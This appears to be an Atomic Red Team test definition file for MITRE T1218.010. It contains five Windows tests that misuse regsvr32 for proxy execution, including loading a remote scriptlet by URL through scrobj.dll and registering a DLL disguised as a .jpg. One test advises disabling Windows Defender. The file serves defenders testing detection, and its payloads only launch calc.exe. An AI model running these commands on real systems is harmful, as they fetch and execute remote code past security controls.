Carrie Roberts
d4709021fb
* updating atomics count in README.md [ci skip] * wip * handle spaces in path * update readme * fix typo --------- Co-authored-by: publish bot <opensource@redcanary.com>
162 lines
6.2 KiB
YAML
162 lines
6.2 KiB
YAML
attack_technique: T1218.010
|
|
display_name: 'Signed Binary Proxy Execution: Regsvr32'
|
|
atomic_tests:
|
|
- name: Regsvr32 local COM scriptlet execution
|
|
auto_generated_guid: 449aa403-6aba-47ce-8a37-247d21ef0306
|
|
description: |
|
|
Regsvr32.exe is a command-line program used to register and unregister OLE controls. Upon execution, calc.exe will be launched.
|
|
supported_platforms:
|
|
- windows
|
|
input_arguments:
|
|
filename:
|
|
description: Name of the local file, include path.
|
|
type: path
|
|
default: PathToAtomicsFolder\T1218.010\src\RegSvr32.sct
|
|
regsvr32path:
|
|
description: Default location of Regsvr32.exe
|
|
type: path
|
|
default: C:\Windows\system32
|
|
regsvr32name:
|
|
description: Default name of Regsvr32.exe
|
|
type: string
|
|
default: regsvr32.exe
|
|
dependency_executor_name: powershell
|
|
dependencies:
|
|
- description: |
|
|
Regsvr32.sct must exist on disk at specified location (#{filename})
|
|
prereq_command: |
|
|
if (Test-Path "#{filename}") {exit 0} else {exit 1}
|
|
get_prereq_command: |
|
|
New-Item -Type Directory (split-path "#{filename}") -ErrorAction ignore | Out-Null
|
|
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.010/src/RegSvr32.sct" -OutFile "#{filename}"
|
|
executor:
|
|
command: |
|
|
#{regsvr32path}\#{regsvr32name} /s /u /i:"#{filename}" scrobj.dll
|
|
name: command_prompt
|
|
|
|
- name: Regsvr32 remote COM scriptlet execution
|
|
auto_generated_guid: c9d0c4ef-8a96-4794-a75b-3d3a5e6f2a36
|
|
description: |
|
|
Regsvr32.exe is a command-line program used to register and unregister OLE controls. This test may be blocked by windows defender; disable
|
|
windows defender real-time protection to fix it. Upon execution, calc.exe will be launched.
|
|
supported_platforms:
|
|
- windows
|
|
input_arguments:
|
|
url:
|
|
description: URL to hosted sct file
|
|
type: url
|
|
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.010/src/RegSvr32.sct
|
|
regsvr32path:
|
|
description: Default location of Regsvr32.exe
|
|
type: path
|
|
default: C:\Windows\system32
|
|
regsvr32name:
|
|
description: Default name of Regsvr32.exe
|
|
type: string
|
|
default: regsvr32.exe
|
|
executor:
|
|
command: |
|
|
#{regsvr32path}\#{regsvr32name} /s /u /i:#{url} scrobj.dll
|
|
name: command_prompt
|
|
|
|
- name: Regsvr32 local DLL execution
|
|
auto_generated_guid: 08ffca73-9a3d-471a-aeb0-68b4aa3ab37b
|
|
description: |
|
|
Regsvr32.exe is a command-line program used to register and unregister OLE controls. Upon execution, calc.exe will be launched.
|
|
supported_platforms:
|
|
- windows
|
|
input_arguments:
|
|
dll_name:
|
|
description: Name of DLL to Execute, DLL Should export DllRegisterServer
|
|
type: path
|
|
default: PathToAtomicsFolder\T1218.010\bin\AllTheThingsx86.dll
|
|
regsvr32path:
|
|
description: Default location of Regsvr32.exe
|
|
type: path
|
|
default: C:\Windows\system32
|
|
regsvr32name:
|
|
description: Default name of Regsvr32.exe
|
|
type: string
|
|
default: regsvr32.exe
|
|
dependency_executor_name: powershell
|
|
dependencies:
|
|
- description: |
|
|
AllTheThingsx86.dll must exist on disk at specified location (#{dll_name})
|
|
prereq_command: |
|
|
if (Test-Path "#{dll_name}") {exit 0} else {exit 1}
|
|
get_prereq_command: |
|
|
New-Item -Type Directory (split-path "#{dll_name}") -ErrorAction ignore | Out-Null
|
|
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.010/bin/AllTheThingsx86.dll" -OutFile "#{dll_name}"
|
|
executor:
|
|
command: |
|
|
IF "%PROCESSOR_ARCHITECTURE%"=="AMD64" (C:\Windows\syswow64\regsvr32.exe /s #{dll_name}) ELSE ( #{regsvr32path}\#{regsvr32name} /s #{dll_name} )
|
|
name: command_prompt
|
|
|
|
- name: Regsvr32 Registering Non DLL
|
|
auto_generated_guid: 1ae5ea1f-0a4e-4e54-b2f5-4ac328a7f421
|
|
description: |
|
|
Replicating observed Gozi maldoc behavior registering a dll with an altered extension
|
|
|
|
supported_platforms:
|
|
- windows
|
|
|
|
input_arguments:
|
|
dll_file:
|
|
description: Path to renamed dll file to be registered
|
|
type: path
|
|
default: '%temp%\shell32.jpg'
|
|
regsvr32path:
|
|
description: Default location of Regsvr32.exe
|
|
type: path
|
|
default: C:\Windows\system32
|
|
regsvr32name:
|
|
description: Default name of Regsvr32.exe
|
|
type: string
|
|
default: regsvr32.exe
|
|
dependency_executor_name: command_prompt
|
|
dependencies: # (optional)
|
|
- description: |
|
|
Test requires a renamed dll file
|
|
prereq_command: |
|
|
if exist #{dll_file} ( exit 0 ) else ( exit 1 )
|
|
get_prereq_command: | # commands to meet this prerequisite or a message describing how to meet this prereq
|
|
copy "C:\Windows\System32\shell32.dll" "#{dll_file}"
|
|
executor:
|
|
name: command_prompt
|
|
elevation_required: false
|
|
command: |
|
|
#{regsvr32path}\#{regsvr32name} /s #{dll_file}
|
|
cleanup_command: |
|
|
#{regsvr32path}\#{regsvr32name} /U /s #{dll_file}
|
|
|
|
- name: Regsvr32 Silent DLL Install Call DllRegisterServer
|
|
auto_generated_guid: 9d71c492-ea2e-4c08-af16-c6994cdf029f
|
|
description: Regsvr32.exe is a command-line program used to register and unregister OLE controls. Normally, an install is executed with /n to prevent calling DllRegisterServer.
|
|
supported_platforms:
|
|
- windows
|
|
input_arguments:
|
|
dll_name:
|
|
description: Name of DLL to Install
|
|
type: string
|
|
default: PathToAtomicsFolder\T1218.010\bin\AllTheThingsx86.dll
|
|
regsvr32path:
|
|
description: Default location of Regsvr32.exe
|
|
type: string
|
|
default: C:\Windows\system32
|
|
regsvr32name:
|
|
description: Default name of Regsvr32.exe
|
|
type: string
|
|
default: regsvr32.exe
|
|
dependency_executor_name: powershell
|
|
dependencies:
|
|
- description: AllTheThingsx86.dll must exist on disk at specified location (#{dll_name})
|
|
prereq_command: |
|
|
if (Test-Path "#{dll_name}") {exit 0} else {exit 1}
|
|
get_prereq_command: |-
|
|
New-Item -Type Directory (split-path "#{dll_name}") -ErrorAction ignore | Out-Null
|
|
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.010/bin/AllTheThingsx86.dll" -OutFile "#{dll_name}"
|
|
executor:
|
|
command: |
|
|
#{regsvr32path}\#{regsvr32name} /s /i "#{dll_name}"
|
|
name: command_prompt
|